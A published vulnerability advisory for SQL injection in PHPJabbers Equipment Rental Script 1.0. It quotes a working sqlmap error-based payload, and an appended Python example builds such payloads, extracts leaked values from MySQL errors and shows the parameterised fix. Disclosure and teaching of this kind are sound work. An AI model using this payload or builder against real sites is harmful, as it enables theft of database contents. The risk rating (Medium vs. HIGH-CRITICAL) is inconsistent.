Equipment Rental Script 1.0 SQL Injection

2023.09.13
Credit: nu11secur1ty
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

## Title: Equipment Rental Script-1.0 - SQLi
## Author: nu11secur1ty
## Date: 09/12/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/equipment-rental-script/#sectionDemo
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The package_id parameter of the booking request is vulnerable to SQL injection. A lone single quote (') submitted in package_id produced a database error message, the usual first sign that the value is being concatenated into a query; the error-based sqlmap payload below then confirmed the injection. When confirming by hand, review the content of the returned error and the application's handling of the other request parameters as well. Because the injection is error-based, an attacker can read arbitrary data out of the database through the error text, i.e. extract the entire database contents.

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:

```mysql
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: package_id=(-4488))) OR 1 GROUP BY CONCAT(0x71787a6a71,(SELECT (CASE WHEN (7794=7794) THEN 1 ELSE 0 END)),0x7176717671,FLOOR(RAND(0)*2)) HAVING MIN(0)#from(select(sleep(20)))a)&cnt=2&date_from=12/9/2023&hour_from=11&minute_from=00&date_to=12/9/2023&hour_to=12&minute_to=00
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Equipment-Rental-Script-1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/09/phpjabbers-equipment-rental-script-10.html)

## Time spent: 00:25:00
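The following is an added example and is not code from the advisory, from nu11secur1ty, or from PHPJabbers. It models the three pieces of the finding above without touching the real product: the scanner's first probe (a lone single quote), which breaks a query assembled by string concatenation but is inert as a bound parameter; how the FLOOR(RAND(0)*2) / GROUP BY error-based payload quoted in the sqlmap output is built around an arbitrary sub-query; and how the leaked value is recovered from the MySQL "Duplicate entry" error that payload provokes. The packages table, the query shape, the table and column names, and the MySQL error text are all constructed here (the real Equipment Rental Script query is not known from the advisory), and the vulnerable lookup is shown next to its parameterised form, which is the fix for CWE-89.

```python
"""Added example, not the advisory's or the vendor's code.

Everything below is a stand-in: the table, the query shape and the MySQL
error text are constructed for illustration.
"""
import re
import sqlite3

# sqlmap's hex literals in the advisory's payload are plain ASCII fence
# markers that delimit the leaked value inside the error message.
LEFT_HEX, RIGHT_HEX = "71787a6a71", "7176717671"
LEFT_MARKER = bytes.fromhex(LEFT_HEX).decode()    # 'qxzjq'
RIGHT_MARKER = bytes.fromhex(RIGHT_HEX).decode()  # 'qvqvq'


def build_error_based_payload(subquery: str) -> str:
    """Return a package_id value in the shape sqlmap used in the advisory.

    GROUP BY CONCAT(marker, <subquery>, marker, FLOOR(RAND(0)*2)): RAND(0) is
    a fixed sequence in MySQL, so the same group key is produced twice and the
    server aborts with "Duplicate entry '<key>' for key 'group_key'", carrying
    the sub-query result into the error text.  "(-4488)))" closes the assumed
    parentheses of the original statement and "#" comments out its tail.
    """
    return (
        f"(-4488))) OR 1 GROUP BY CONCAT(0x{LEFT_HEX},({subquery}),"
        f"0x{RIGHT_HEX},FLOOR(RAND(0)*2)) HAVING MIN(0)#"
    )


_DUP_ENTRY = re.compile(
    r"Duplicate entry '" + re.escape(LEFT_MARKER)
    + r"(.*?)" + re.escape(RIGHT_MARKER) + r"[01]' for key"
)


def extract_leaked_value(error_text: str):
    """Pull the sub-query result out of a MySQL duplicate-key error, or None."""
    match = _DUP_ENTRY.search(error_text)
    return match.group(1) if match else None


# Constructed sample of what the application would echo back for
# build_error_based_payload("SELECT @@version"); not a real capture.
SAMPLE_ERROR = (
    "MySQL error 1062: Duplicate entry 'qxzjq8.0.36qvqvq1' for key 'group_key'"
)


def demo_db() -> sqlite3.Connection:
    """In-memory stand-in for a rental packages table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE packages (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO packages VALUES (?, ?)",
                     [(1, "Excavator"), (2, "Scaffold"), (3, "Generator")])
    return conn


def vulnerable_lookup(conn, package_id: str):
    """CWE-89: the request parameter is spliced straight into the SQL text."""
    sql = f"SELECT id, name FROM packages WHERE id = {package_id}"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, package_id: str):
    """Same lookup with a bound parameter: the value can never become syntax."""
    return conn.execute(
        "SELECT id, name FROM packages WHERE id = ?", (package_id,)
    ).fetchall()


def probe_with_quote(lookup) -> bool:
    """The detection step from the advisory: does a lone ' raise a DB error?"""
    try:
        lookup(demo_db(), "'")
    except sqlite3.Error:
        return True
    return False


if __name__ == "__main__":
    print("payload:", build_error_based_payload("SELECT @@version"))
    print("leaked :", extract_leaked_value(SAMPLE_ERROR))
    print("quote breaks concatenated query :", probe_with_quote(vulnerable_lookup))
    print("quote breaks parameterised query:", probe_with_quote(safe_lookup))
    print("rows via OR 1=1, vulnerable:", vulnerable_lookup(demo_db(), "0 OR 1=1"))
    print("rows via OR 1=1, safe      :", safe_lookup(demo_db(), "0 OR 1=1"))
```

Run it as a script to see the probe succeed only against the concatenated query, the `0 OR 1=1` input return every row only there, and the constructed error message yield the fenced value. Against a real MySQL target the sub-query handed to build_error_based_payload is what sqlmap swaps out (`@@version`, `database()`, `SELECT ... LIMIT n,1`) to walk the schema one value per request, which is why an error-based finding is rated as full database disclosure.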

Copyright 2024, cxsecurity.com